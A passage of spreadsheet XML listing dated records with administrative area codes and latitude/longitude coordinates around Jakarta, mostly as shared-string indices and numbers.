        <v>3671012</v>
      </c>
      <c r="O148">
        <v>3671</v>
      </c>
      <c r="P148">
        <v>36</v>
      </c>
      <c r="Q148" t="s">
        <v>759</v>
      </c>
      <c r="R148" t="s">
        <v>760</v>
      </c>
      <c r="S148" t="s">
        <v>201</v>
      </c>
      <c r="T148" t="s">
        <v>171</v>
      </c>
      <c r="U148" s="5">
        <v>10669636</v>
      </c>
      <c r="V148" s="5" t="s">
        <v>14592</v>
      </c>
      <c r="W148" s="5">
        <v>-622228</v>
      </c>
      <c r="X148" t="s">
        <v>18405</v>
      </c>
      <c r="Y148" t="str">
        <f t="shared" si="2"/>
        <v>-6.22228,106.69636</v>
      </c>
    </row>
    <row r="149" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A149">
        <v>100940</v>
      </c>
      <c r="B149" s="1">
        <v>43832</v>
      </c>
      <c r="C149" s="2">
        <v>0.38390046296296299</v>
      </c>
      <c r="D149" t="s">
        <v>85</v>
      </c>
      <c r="E149" t="s">
        <v>23</v>
      </c>
      <c r="F149" t="s">
        <v>765</v>
      </c>
      <c r="G149" t="s">
        <v>766</v>
      </c>
      <c r="H149" t="s">
        <v>26</v>
      </c>
      <c r="J149" t="s">
        <v>37</v>
      </c>
      <c r="K149" t="s">
        <v>767</v>
      </c>
      <c r="L149" t="s">
        <v>768</v>
      </c>
      <c r="M149">
        <v>3671012001</v>
      </c>
      <c r="N149">
        <v>3671012</v>
      </c>
      <c r="O149">
        <v>3671</v>
      </c>
      <c r="P149">
        <v>36</v>
      </c>
      <c r="Q149" t="s">
        <v>759</v>
      </c>
      <c r="R149" t="s">
        <v>760</v>
      </c>
      <c r="S149" t="s">
        <v>201</v>
      </c>
      <c r="T149" t="s">
        <v>171</v>
      </c>
      <c r="U149" s="5">
        <v>10669637</v>
      </c>
      <c r="V149" s="5" t="s">
        <v>14593</v>
      </c>
      <c r="W149" s="5">
        <v>-622228</v>
      </c>
      <c r="X149" t="s">
        <v>18405</v>
      </c>
      <c r="Y149" t="str">
        <f t="shared" si="2"/>
        <v>-6.22228,106.69637</v>
      </c>
    </row>
    <row r="150" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A150">
        <v>100949</v>
      </c>
      <c r="B150" s="1">
        <v>43832</v>
      </c>
      <c r="C150" s="2">
        <v>0.39054398148148151</v>
      </c>
      <c r="D150" t="s">
        <v>22</v>
      </c>
      <c r="E150" t="s">
        <v>23</v>
      </c>
      <c r="F150" t="s">
        <v>769</v>
      </c>
      <c r="G150" t="s">
        <v>770</v>
      </c>
      <c r="H150" t="s">
        <v>26</v>
      </c>
      <c r="I150" t="s">
        <v>771</v>
      </c>
      <c r="J150" t="s">
        <v>28</v>
      </c>
      <c r="L150" t="s">
        <v>772</v>
      </c>
      <c r="M150">
        <v>3174020005</v>
      </c>
      <c r="N150">
        <v>3174020</v>
      </c>
      <c r="O150">
        <v>3174</v>
      </c>
      <c r="P150">
        <v>31</v>
      </c>
      <c r="Q150" t="s">
        <v>30</v>
      </c>
      <c r="R150" t="s">
        <v>31</v>
      </c>
      <c r="S150" t="s">
        <v>32</v>
      </c>
      <c r="T150" t="s">
        <v>33</v>
      </c>
      <c r="U150" s="5">
        <v>10676848</v>
      </c>
      <c r="V150" s="5" t="s">
        <v>14594</v>
      </c>
      <c r="W150" s="5">
        <v>-617531</v>
      </c>
      <c r="X150" t="s">
        <v>18406</v>
      </c>
      <c r="Y150" t="str">
        <f t="shared" si="2"/>
        <v>-6.17531,106.76848</v>
      </c>
    </row>
    <row r="151" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A151">
        <v>101031</v>
      </c>
      <c r="B151" s="1">
        <v>43832</v>
      </c>
      <c r="C151" s="2">
        <v>0.40025462962962965</v>
      </c>
      <c r="D151" t="s">
        <v>22</v>
      </c>
      <c r="E151" t="s">
        <v>23</v>
      </c>
      <c r="F151" t="s">
        <v>773</v>
      </c>
      <c r="H151" t="s">
        <v>26</v>
      </c>
      <c r="I151" t="s">
        <v>774</v>
      </c>
      <c r="J151" t="s">
        <v>614</v>
      </c>
      <c r="L151" t="s">
        <v>775</v>
      </c>
      <c r="M151">
        <v>3175010002</v>
      </c>
      <c r="N151">
        <v>3175010</v>
      </c>
      <c r="O151">
        <v>3175</v>
      </c>
      <c r="P151">
        <v>31</v>
      </c>
      <c r="Q151" t="s">
        <v>616</v>
      </c>
      <c r="R151" t="s">
        <v>546</v>
      </c>
      <c r="S151" t="s">
        <v>547</v>
      </c>
      <c r="T151" t="s">
        <v>33</v>
      </c>
      <c r="U151" s="5">
        <v>10677273</v>
      </c>
      <c r="V151" s="5" t="s">
        <v>14595</v>
      </c>
      <c r="W151" s="5">
        <v>-613315</v>
      </c>
      <c r="X151" t="s">
        <v>18407</v>
      </c>
      <c r="Y151" t="str">
        <f t="shared" si="2"/>
        <v>-6.13315,106.77273</v>
      </c>
    </row>
    <row r="152" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A152">
        <v>101095</v>
      </c>
      <c r="B152" s="1">
        <v>43832</v>
      </c>
      <c r="C152" s="2">
        <v>0.40749999999999997</v>
      </c>
      <c r="D152" t="s">
        <v>85</v>
      </c>
      <c r="E152" t="s">
        <v>23</v>
      </c>
      <c r="F152" t="s">
        <v>776</v>
      </c>
      <c r="G152" t="s">
        <v>777</v>
      </c>
      <c r="H152" t="s">
        <v>26</v>
      </c>
      <c r="I152" t="s">
        <v>103</v>
      </c>
      <c r="J152" t="s">
        <v>778</v>
      </c>
      <c r="K152" t="s">
        <v>779</v>
      </c>
      <c r="L152" t="s">
        <v>780</v>
      </c>
      <c r="M152">
        <v>3171070004</v>
      </c>
      <c r="N152">
        <v>3171070</v>
      </c>
      <c r="O152">
        <v>3171</v>
      </c>
      <c r="P152">
        <v>31</v>
      </c>
      <c r="Q152" t="s">
        <v>121</v>
      </c>
      <c r="R152" t="s">
        <v>121</v>
      </c>
      <c r="S152" t="s">
        <v>108</v>
      </c>
      <c r="T152" t="s">
        <v>33</v>
      </c>
      <c r="U152" s="5">
        <v>10683016</v>
      </c>
      <c r="V152" s="5" t="s">
        <v>14596</v>
      </c>
      <c r="W152" s="5">
        <v>-624118</v>
      </c>
      <c r="X152" t="s">
        <v>18408</v>
      </c>
      <c r="Y152" t="str">
        <f t="shared" si="2"/>
        <v>-6.24118,106.83016</v>
      </c>
    </row>
    <row r="153" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A153">
        <v>101104</v>
      </c>
      <c r="B153" s="1">
        <v>43832</v>
      </c>
      <c r="C153" s="2">
        <v>0.41098379629629633</v>
      </c>
      <c r="D153" t="s">
        <v>22</v>
      </c>
      <c r="E153" t="s">
        <v>23</v>
      </c>
      <c r="F153" t="s">
        <v>781</v>
      </c>
      <c r="H153" t="s">
        <v>26</v>
      </c>
      <c r="I153" t="s">
        <v>628</v>
      </c>
      <c r="J153" t="s">
        <v>629</v>
      </c>
      <c r="L153" t="s">
        <v>782</v>
      </c>
      <c r="M153">
        <v>3174040007</v>
      </c>
      <c r="N153">
        <v>3174040</v>
      </c>
      <c r="O153">
        <v>3174</v>
      </c>
      <c r="P153">
        <v>31</v>
      </c>
      <c r="Q153" t="s">
        <v>389</v>
      </c>
      <c r="R153" t="s">
        <v>377</v>
      </c>
      <c r="S153" t="s">
        <v>32</v>
      </c>
      <c r="T153" t="s">
        <v>33</v>
      </c>
      <c r="U153" s="5">
        <v>10678374</v>
      </c>
      <c r="V153" s="5" t="s">
        <v>14597</v>
      </c>
      <c r="W153" s="5">
        <v>-614728</v>
      </c>
      <c r="X153" t="s">
        <v>18409</v>
      </c>
      <c r="Y153" t="str">
        <f t="shared" si="2"/>
        <v>-6.14728,106.78374</v>
      </c>
    </row>
    <row r="154" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A154">
        <v>101125</v>
      </c>
      <c r="B154" s="1">
        <v>43832</v>
      </c>
      <c r="C154" s="2">
        <v>0.41289351851851852</v>
      </c>
      <c r="D154" t="s">
        <v>22</v>
      </c>
      <c r="E154" t="s">
        <v>23</v>
      </c>
      <c r="F154" t="s">
        <v>783</v>
      </c>
      <c r="H154" t="s">
        <v>26</v>
      </c>
      <c r="I154" t="s">
        <v>784</v>
      </c>
      <c r="J154" t="s">
        <v>785</v>
      </c>
      <c r="L154" t="s">
        <v>786</v>
      </c>
      <c r="M154">
        <v>3174080001</v>
      </c>
      <c r="N154">
        <v>3174080</v>
      </c>
      <c r="O154">
        <v>3174</v>
      </c>
      <c r="P154">
        <v>31</v>
      </c>
      <c r="Q154" t="s">
        <v>694</v>
      </c>
      <c r="R154" t="s">
        <v>695</v>
      </c>
      <c r="S154" t="s">
        <v>32</v>
      </c>
      <c r="T154" t="s">
        <v>33</v>
      </c>
      <c r="U154" s="5">
        <v>10671309</v>
      </c>
      <c r="V154" s="5" t="s">
        <v>14598</v>
      </c>
      <c r="W154" s="5">
        <v>-615994</v>
      </c>
      <c r="X154" t="s">
        <v>18410</v>
      </c>
      <c r="Y154" t="str">
        <f t="shared" si="2"/>
        <v>-6.15994,106.71309</v>
      </c>
    </row>
    <row r="155" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A155">
        <v>101146</v>
      </c>
      <c r="B155" s="1">
        <v>43832</v>
      </c>
      <c r="C155" s="2">
        <v>0.41510416666666666</v>
      </c>
      <c r="D155" t="s">
        <v>22</v>
      </c>
      <c r="E155" t="s">
        <v>23</v>
      </c>
      <c r="F155" t="s">
        <v>787</v>
      </c>
      <c r="H155" t="s">
        <v>26</v>
      </c>
      <c r="I155" t="s">
        <v>788</v>
      </c>
      <c r="J155" t="s">
        <v>629</v>
      </c>
      <c r="L155" t="s">
        <v>789</v>
      </c>
      <c r="M155">
        <v>3174040007</v>
      </c>
      <c r="N155">
        <v>3174040</v>
      </c>
      <c r="O155">
        <v>3174</v>
      </c>
      <c r="P155">
        <v>31</v>
      </c>
      <c r="Q155" t="s">
        <v>389</v>
      </c>
      <c r="R155" t="s">
        <v>377</v>
      </c>
      <c r="S155" t="s">
        <v>32</v>
      </c>
      <c r="T155" t="s">
        <v>33</v>
      </c>
      <c r="U155" s="5">
        <v>10678325</v>
      </c>
      <c r="V155" s="5" t="s">
        <v>14599</v>
      </c>
      <c r="W155" s="5">
        <v>-614458</v>
      </c>
      <c r="X155" t="s">
        <v>18411</v>
      </c>
      <c r="Y155" t="str">
        <f t="shared" si="2"/>
        <v>-6.14458,106.78325</v>
      </c>
    </row>
    <row r="156" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A156">
        <v>101179</v>
      </c>
      <c r="B156" s="1">
        <v>43832</v>
      </c>
      <c r="C156" s="2">
        <v>0.41869212962962959</v>
      </c>
      <c r="D156" t="s">
        <v>22</v>
      </c>
      <c r="E156" t="s">
        <v>23</v>
      </c>
      <c r="F156" t="s">
        <v>790</v>
      </c>
      <c r="G156" t="s">
        <v>791</v>
      </c>
      <c r="H156" t="s">
        <v>26</v>
      </c>
      <c r="I156" t="s">
        <v>792</v>
      </c>
      <c r="J156" t="s">
        <v>793</v>
      </c>
      <c r="L156" t="s">
        <v>794</v>
      </c>
      <c r="M156">
        <v>3175010002</v>
      </c>
      <c r="N156">
        <v>3175010</v>
      </c>
      <c r="O156">
        <v>3175</v>
      </c>
      <c r="P156">
        <v>31</v>
      </c>
      <c r="Q156" t="s">
        <v>616</v>
      </c>
      <c r="R156" t="s">
        <v>546</v>
      </c>
      <c r="S156" t="s">
        <v>547</v>
      </c>
      <c r="T156" t="s">
        <v>33</v>
      </c>
      <c r="U156" s="5">
        <v>10677499</v>
      </c>
      <c r="V156" s="5" t="s">
        <v>14600</v>
      </c>
      <c r="W156" s="5">
        <v>-613859</v>
      </c>
      <c r="X156" t="s">
        <v>18412</v>
      </c>
      <c r="Y156" t="str">
        <f t="shared" si="2"/>
        <v>-6.13859,106.77499</v>
      </c>
    </row>
    <row r="157" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A157">
        <v>101266</v>
      </c>
      <c r="B157" s="1">
        <v>43832</v>
      </c>
      <c r="C157" s="2">
        <v>0.42509259259259258</v>
      </c>
      <c r="D157" t="s">
        <v>85</v>
      </c>
      <c r="E157" t="s">
        <v>23</v>
      </c>
      <c r="F157" t="s">
        <v>795</v>
      </c>
      <c r="G157" t="s">
        <v>796</v>
      </c>
      <c r="H157" t="s">
        <v>26</v>
      </c>
      <c r="I157" t="s">
        <v>608</v>
      </c>
      <c r="J157" t="s">
        <v>797</v>
      </c>
      <c r="K157" t="s">
        <v>798</v>
      </c>
      <c r="L157" t="s">
        <v>799</v>
      </c>
      <c r="M157">
        <v>3172060001</v>
      </c>
      <c r="N157">
        <v>3172060</v>
      </c>
      <c r="O157">
        <v>3172</v>
      </c>
      <c r="P157">
        <v>31</v>
      </c>
      <c r="Q157" t="s">
        <v>309</v>
      </c>
      <c r="R157" t="s">
        <v>48</v>
      </c>
      <c r="S157" t="s">
        <v>49</v>
      </c>
      <c r="T157" t="s">
        <v>33</v>
      </c>
      <c r="U157" s="5">
        <v>10686888</v>
      </c>
      <c r="V157" s="5" t="s">
        <v>14601</v>
      </c>
      <c r="W157" s="5">
        <v>-624350</v>
      </c>
      <c r="X157" t="s">
        <v>18413</v>
      </c>
      <c r="Y157" t="str">
        <f t="shared" si="2"/>
        <v>-6.24350,106.86888</v>
      </c>
    </row>
    <row r="158" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A158">
        <v>101271</v>
      </c>
      <c r="B158" s="1">
        <v>43832</v>
      </c>
      <c r="C158" s="2">
        <v>0.43633101851851852</v>
      </c>
      <c r="D158" t="s">
        <v>22</v>
      </c>
      <c r="E158" t="s">
        <v>23</v>
      </c>
      <c r="F158" t="s">
        <v>800</v>
      </c>
      <c r="H158" t="s">
        <v>26</v>
      </c>
      <c r="I158" t="s">
        <v>277</v>
      </c>
      <c r="J158" t="s">
        <v>801</v>
      </c>
      <c r="L158" t="s">
        <v>802</v>
      </c>
      <c r="M158">
        <v>3174010006</v>
      </c>
      <c r="N158">
        <v>3174010</v>
      </c>
      <c r="O158">
        <v>3174</v>
      </c>
      <c r="P158">
        <v>31</v>
      </c>
      <c r="Q158" t="s">
        <v>268</v>
      </c>
      <c r="R158" t="s">
        <v>69</v>
      </c>
      <c r="S158" t="s">
        <v>32</v>
      </c>
      <c r="T158" t="s">
        <v>33</v>
      </c>
      <c r="U158" s="5">
        <v>10675893</v>
      </c>
      <c r="V158" s="5" t="s">
        <v>14602</v>
      </c>
      <c r="W158" s="5">
        <v>-615927</v>
      </c>
      <c r="X158" t="s">
        <v>18414</v>
      </c>
      <c r="Y158" t="str">
        <f t="shared" si="2"/>
        <v>-6.15927,106.75893</v>
      </c>
    </row>
    <row r="159" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A159">
        <v>101274</v>
      </c>
      <c r="B159" s="1">
        <v>43832</v>
      </c>
      <c r="C159" s="2">
        <v>0.43679398148148146</v>
      </c>
      <c r="D159" t="s">
        <v>22</v>
      </c>
      <c r="E159" t="s">
        <v>23</v>
      </c>
      <c r="F159" t="s">
        <v>803</v>
      </c>
      <c r="G159" t="s">
        <v>804</v>
      </c>
      <c r="H159" t="s">
        <v>26</v>
      </c>
      <c r="I159" t="s">
        <v>805</v>
      </c>
      <c r="J159" t="s">
        <v>28</v>
      </c>
      <c r="L159" t="s">
        <v>806</v>
      </c>
      <c r="M159">
        <v>3174020005</v>
      </c>
      <c r="N159">
        <v>3174020</v>
      </c>
      <c r="O159">
        <v>3174</v>
      </c>
      <c r="P159">
        <v>31</v>
      </c>
      <c r="Q159" t="s">
        <v>30</v>
      </c>
      <c r="R159" t="s">
        <v>31</v>
      </c>
      <c r="S159" t="s">
        <v>32</v>
      </c>
      <c r="T159" t="s">
        <v>33</v>
      </c>
      <c r="U159" s="5">
        <v>10677110</v>
      </c>
      <c r="V159" s="5" t="s">
        <v>14603</v>
      </c>
      <c r="W159" s="5">
        <v>-617060</v>
      </c>
      <c r="X159" t="s">
        <v>18415</v>
      </c>
      <c r="Y159" t="str">
        <f t="shared" si="2"/>
        <v>-6.17060,106.77110</v>
      </c>
    </row>
    <row r="160" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A160">
        <v>101287</v>
      </c>
      <c r="B160" s="1">
        <v>43832</v>
      </c>
      <c r="C160" s="2">
        <v>0.43236111111111114</v>
      </c>
      <c r="D160" t="s">
        <v>85</v>
      </c>
      <c r="E160" t="s">
        <v>23</v>
      </c>
      <c r="F160" t="s">
        <v>807</v>
      </c>
      <c r="G160" t="s">
        <v>808</v>
      </c>
      <c r="H160" t="s">
        <v>26</v>
      </c>
      <c r="I160" t="s">
        <v>103</v>
      </c>
      <c r="J160" t="s">
        <v>809</v>
      </c>
      <c r="K160" t="s">
        <v>810</v>
      </c>
      <c r="L160" t="s">
        <v>811</v>
      </c>
      <c r="M160">
        <v>3172060001</v>
      </c>
      <c r="N160">
        <v>3172060</v>
      </c>
      <c r="O160">
        <v>3172</v>
      </c>
      <c r="P160">
        <v>31</v>
      </c>
      <c r="Q160" t="s">
        <v>309</v>
      </c>
      <c r="R160" t="s">
        <v>48</v>
      </c>
      <c r="S160" t="s">
        <v>49</v>
      </c>
      <c r="T160" t="s">
        <v>33</v>
      </c>
      <c r="U160" s="5">
        <v>10686632</v>
      </c>
      <c r="V160" s="5" t="s">
        <v>14604</v>
      </c>
      <c r="W160" s="5">
        <v>-622485</v>
      </c>
      <c r="X160" t="s">
        <v>18416</v>
      </c>
      <c r="Y160" t="str">
        <f t="shared" si="2"/>
        <v>-6.22485,106.86632</v>
      </c>
    </row>
    <row r="161" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A161">
        <v>101299</v>
      </c>
      <c r="B161" s="1">
        <v>43832</v>
      </c>
      <c r="C161" s="2">
        <v>0.43878472222222226</v>
      </c>
      <c r="D161" t="s">
        <v>85</v>
      </c>
      <c r="E161" t="s">
        <v>23</v>
      </c>
      <c r="F161" t="s">
        <v>812</v>
      </c>
      <c r="G161" t="s">
        <v>813</v>
      </c>
      <c r="H161" t="s">
        <v>26</v>
      </c>
      <c r="J161" t="s">
        <v>814</v>
      </c>
      <c r="K161" t="s">
        <v>815</v>
      </c>
      <c r="L161" t="s">
        <v>816</v>
      </c>
      <c r="M161">
        <v>3172060007</v>
      </c>
      <c r="N161">
        <v>3172060</v>
      </c>
      <c r="O161">
        <v>3172</v>
      </c>
      <c r="P161">
        <v>31</v>
      </c>
      <c r="Q161" t="s">
        <v>817</v>
      </c>
      <c r="R161" t="s">
        <v>48</v>
      </c>
      <c r="S161" t="s">
        <v>49</v>
      </c>
      <c r="T161" t="s">
        <v>33</v>
      </c>
      <c r="U161" s="5">
        <v>10686312</v>
      </c>
      <c r="V161" s="5" t="s">
        <v>14605</v>
      </c>
      <c r="W161" s="5">
        <v>-621445</v>
      </c>
      <c r="X161" t="s">
        <v>18417</v>
      </c>
      <c r="Y161" t="str">
        <f t="shared" si="2"/>
        <v>-6.21445,106.86312</v>
      </c>
    </row>
    <row r="162" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A162">
        <v>101308</v>
      </c>
      <c r="B162" s="1">
        <v>43832</v>
      </c>
      <c r="C162" s="2">
        <v>0.44351851851851848</v>
      </c>
      <c r="D162" t="s">
        <v>22</v>
      </c>
      <c r="E162" t="s">
        <v>23</v>
      </c>
      <c r="F162" t="s">
        <v>818</v>
      </c>
      <c r="H162" t="s">
        <v>26</v>
      </c>
      <c r="I162" t="s">
        <v>819</v>
      </c>
      <c r="J162" t="s">
        <v>543</v>
      </c>
      <c r="L162" t="s">
        <v>820</v>
      </c>
      <c r="M162">
        <v>3175010003</v>
      </c>
      <c r="N162">
        <v>3175010</v>
      </c>
      <c r="O162">
        <v>3175</v>
      </c>
      <c r="P162">
        <v>31</v>
      </c>
      <c r="Q162" t="s">
        <v>545</v>
      </c>
      <c r="R162" t="s">
        <v>546</v>
      </c>
      <c r="S162" t="s">
        <v>547</v>
      </c>
      <c r="T162" t="s">
        <v>33</v>
      </c>
      <c r="U162" s="5">
        <v>10678136</v>
      </c>
      <c r="V162" s="5" t="s">
        <v>14606</v>
      </c>
      <c r="W162" s="5">
        <v>-613795</v>
      </c>
      <c r="X162" t="s">
        <v>18418</v>
      </c>
      <c r="Y162" t="str">
        <f t="shared" si="2"/>
        <v>-6.13795,106.78136</v>
      </c>
    </row>
    <row r="163" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A163">
        <v>101313</v>
      </c>
      <c r="B163" s="1">
        <v>43832</v>
      </c>
      <c r="C163" s="2">
        <v>0.44393518518518515</v>
      </c>
      <c r="D163" t="s">
        <v>22</v>
      </c>
      <c r="E163" t="s">
        <v>23</v>
      </c>
      <c r="F163" t="s">
        <v>821</v>
      </c>
      <c r="H163" t="s">
        <v>26</v>
      </c>
      <c r="I163" t="s">
        <v>745</v>
      </c>
      <c r="J163" t="s">
        <v>37</v>
      </c>
      <c r="L163" t="s">
        <v>822</v>
      </c>
      <c r="M163">
        <v>3671020016</v>
      </c>
      <c r="N163">
        <v>3671020</v>
      </c>
      <c r="O163">
        <v>3671</v>
      </c>
      <c r="P163">
        <v>36</v>
      </c>
      <c r="Q163" t="s">
        <v>823</v>
      </c>
      <c r="R163" t="s">
        <v>274</v>
      </c>
      <c r="S163" t="s">
        <v>201</v>
      </c>
      <c r="T163" t="s">
        <v>171</v>
      </c>
      <c r="U163" s="5">
        <v>10670079</v>
      </c>
      <c r="V163" s="5" t="s">
        <v>14607</v>
      </c>
      <c r="W163" s="5">
        <v>-619510</v>
      </c>
      <c r="X163" t="s">
        <v>18419</v>
      </c>
      <c r="Y163" t="str">
        <f t="shared" si="2"/>
        <v>-6.19510,106.70079</v>
      </c>
    </row>
    <row r="164" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A164">
        <v>101322</v>
      </c>
      <c r="B164" s="1">
        <v>43832</v>
      </c>
      <c r="C164" s="2">
        <v>0.44460648148148146</v>
      </c>
      <c r="D164" t="s">
        <v>22</v>
      </c>
      <c r="E164" t="s">
        <v>23</v>
      </c>
      <c r="F164" t="s">
        <v>824</v>
      </c>
      <c r="H164" t="s">
        <v>26</v>
      </c>
      <c r="I164" t="s">
        <v>825</v>
      </c>
      <c r="J164" t="s">
        <v>37</v>
      </c>
      <c r="L164" t="s">
        <v>826</v>
      </c>
      <c r="M164">
        <v>3275020005</v>
      </c>
      <c r="N164">
        <v>3275020</v>
      </c>
      <c r="O164">
        <v>3275</v>
      </c>
      <c r="P164">
        <v>32</v>
      </c>
      <c r="Q164" t="s">
        <v>827</v>
      </c>
      <c r="R164" t="s">
        <v>828</v>
      </c>
      <c r="S164" t="s">
        <v>41</v>
      </c>
      <c r="T164" t="s">
        <v>42</v>
      </c>
      <c r="U164" s="5">
        <v>10695150</v>
      </c>
      <c r="V164" s="5" t="s">
        <v>14608</v>
      </c>
      <c r="W164" s="5">
        <v>-628748</v>
      </c>
      <c r="X164" t="s">
        <v>18420</v>
      </c>
      <c r="Y164" t="str">
        <f t="shared" si="2"/>
        <v>-6.28748,106.95150</v>
      </c>
    </row>
    <row r="165" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A165">
        <v>101355</v>
      </c>
      <c r="B165" s="1">
        <v>43832</v>
      </c>
      <c r="C165" s="2">
        <v>0.44627314814814811</v>
      </c>
      <c r="D165" t="s">
        <v>22</v>
      </c>
      <c r="E165" t="s">
        <v>23</v>
      </c>
      <c r="F165" t="s">
        <v>829</v>
      </c>
      <c r="G165" t="s">
        <v>830</v>
      </c>
      <c r="H165" t="s">
        <v>26</v>
      </c>
      <c r="I165" t="s">
        <v>831</v>
      </c>
      <c r="J165" t="s">
        <v>37</v>
      </c>
      <c r="M165">
        <v>3174070001</v>
      </c>
      <c r="N165">
        <v>3174070</v>
      </c>
      <c r="O165">
        <v>3174</v>
      </c>
      <c r="P165">
        <v>31</v>
      </c>
      <c r="Q165" t="s">
        <v>83</v>
      </c>
      <c r="R165" t="s">
        <v>84</v>
      </c>
      <c r="S165" t="s">
        <v>32</v>
      </c>
      <c r="T165" t="s">
        <v>33</v>
      </c>
      <c r="U165" s="5">
        <v>10672183</v>
      </c>
      <c r="V165" s="5" t="s">
        <v>14609</v>
      </c>
      <c r="W165" s="5">
        <v>-618488</v>
      </c>
      <c r="X165" t="s">
        <v>18421</v>
      </c>
      <c r="Y165" t="str">
        <f t="shared" si="2"/>
        <v>-6.18488,106.72183</v>
      </c>
    </row>
    <row r="166" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A166">
        <v>101356</v>
      </c>
      <c r="B166" s="1">
        <v>43832</v>
      </c>
      <c r="C166" s="2">
        <v>0.44640046296296299</v>
      </c>
      <c r="D166" t="s">
        <v>22</v>
      </c>
      <c r="E166" t="s">
        <v>23</v>
      </c>
      <c r="F166" t="s">
        <v>832</v>
      </c>
      <c r="G166" t="s">
        <v>833</v>
      </c>
      <c r="H166" t="s">
        <v>26</v>
      </c>
      <c r="I166" t="s">
        <v>834</v>
      </c>
      <c r="J166" t="s">
        <v>614</v>
      </c>
      <c r="L166" t="s">
        <v>835</v>
      </c>
      <c r="M166">
        <v>3175010002</v>
      </c>
      <c r="N166">
        <v>3175010</v>
      </c>
      <c r="O166">
        <v>3175</v>
      </c>
      <c r="P166">
        <v>31</v>
      </c>
      <c r="Q166" t="s">
        <v>616</v>
      </c>
      <c r="R166" t="s">
        <v>546</v>
      </c>
      <c r="S166" t="s">
        <v>547</v>
      </c>
      <c r="T166" t="s">
        <v>33</v>
      </c>
      <c r="U166" s="5">
        <v>10676979</v>
      </c>
      <c r="V166" s="5" t="s">
        <v>14610</v>
      </c>
      <c r="W166" s="5">
        <v>-613108</v>
      </c>
      <c r="X166" t="s">
        <v>18422</v>
      </c>
      <c r="Y166" t="str">
        <f t="shared" si="2"/>
        <v>-6.13108,106.76979</v>
      </c>
    </row>
    <row r="167" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A167">
        <v>101361</v>
      </c>
      <c r="B167" s="1">
        <v>43832</v>
      </c>
      <c r="C167" s="2">
        <v>0.44667824074074075</v>
      </c>
      <c r="D167" t="s">
        <v>22</v>
      </c>
      <c r="E167" t="s">
        <v>23</v>
      </c>
      <c r="F167" t="s">
        <v>836</v>
      </c>
      <c r="G167" t="s">
        <v>837</v>
      </c>
      <c r="H167" t="s">
        <v>26</v>
      </c>
      <c r="I167" t="s">
        <v>838</v>
      </c>
      <c r="J167" t="s">
        <v>839</v>
      </c>
      <c r="L167" t="s">
        <v>840</v>
      </c>
      <c r="M167">
        <v>3175010002</v>
      </c>
      <c r="N167">
        <v>3175010</v>
      </c>
      <c r="O167">
        <v>3175</v>
      </c>
      <c r="P167">
        <v>31</v>
      </c>
      <c r="Q167" t="s">
        <v>616</v>
      </c>
      <c r="R167" t="s">
        <v>546</v>
      </c>
      <c r="S167" t="s">
        <v>547</v>
      </c>
      <c r="T167" t="s">
        <v>33</v>
      </c>
      <c r="U167" s="5">
        <v>10676413</v>
      </c>
      <c r="V167" s="5" t="s">
        <v>14611</v>
      </c>
      <c r="W167" s="5">
        <v>-613375</v>
      </c>
      <c r="X167" t="s">
        <v>18423</v>
      </c>
      <c r="Y167" t="str">
        <f t="shared" si="2"/>
        <v>-6.13375,106.76413</v>
      </c>
    </row>
    <row r="168" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A168">
        <v>101398</v>
      </c>
      <c r="B168" s="1">
        <v>43832</v>
      </c>
      <c r="C168" s="2">
        <v>0.45175925925925925</v>
      </c>
      <c r="D168" t="s">
        <v>22</v>
      </c>
      <c r="E168" t="s">
        <v>23</v>
      </c>
      <c r="F168" t="s">
        <v>841</v>
      </c>
      <c r="G168" t="s">
        <v>842</v>
      </c>
      <c r="H168" t="s">
        <v>26</v>
      </c>
      <c r="I168" t="s">
        <v>843</v>
      </c>
      <c r="J168" t="s">
        <v>614</v>
      </c>
      <c r="L168" t="s">
        <v>835</v>
      </c>
      <c r="M168">
        <v>3175010002</v>
      </c>
      <c r="N168">
        <v>3175010</v>
      </c>
      <c r="O168">
        <v>3175</v>
      </c>
      <c r="P168">
        <v>31</v>
      </c>
      <c r="Q168" t="s">
        <v>616</v>
      </c>
      <c r="R168" t="s">
        <v>546</v>
      </c>
      <c r="S168" t="s">
        <v>547</v>
      </c>
      <c r="T168" t="s">
        <v>33</v>
      </c>
      <c r="U168" s="5">
        <v>10676995</v>
      </c>
      <c r="V168" s="5" t="s">
        <v>14612</v>
      </c>
      <c r="W168" s="5">
        <v>-613109</v>
      </c>
      <c r="X168" t="s">
        <v>18424</v>
      </c>
      <c r="Y168" t="str">
        <f t="shared" si="2"/>
        <v>-6.13109,106.76995</v>
      </c>
    </row>
    <row r="169" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A169">
        <v>101459</v>
      </c>
      <c r="B169" s="1">
        <v>43832</v>
      </c>
      <c r="C169" s="2">
        <v>0.45695601851851847</v>
      </c>
      <c r="D169" t="s">
        <v>22</v>
      </c>
      <c r="E169" t="s">
        <v>23</v>
      </c>
      <c r="F169" t="s">
        <v>844</v>
      </c>
      <c r="H169" t="s">
        <v>26</v>
      </c>
      <c r="I169" t="s">
        <v>845</v>
      </c>
      <c r="J169" t="s">
        <v>846</v>
      </c>
      <c r="L169" t="s">
        <v>847</v>
      </c>
      <c r="M169">
        <v>3174070002</v>
      </c>
      <c r="N169">
        <v>3174070</v>
      </c>
      <c r="O169">
        <v>3174</v>
      </c>
      <c r="P169">
        <v>31</v>
      </c>
      <c r="Q169" t="s">
        <v>621</v>
      </c>
      <c r="R169" t="s">
        <v>84</v>
      </c>
      <c r="S169" t="s">
        <v>32</v>
      </c>
      <c r="T169" t="s">
        <v>33</v>
      </c>
      <c r="U169" s="5">
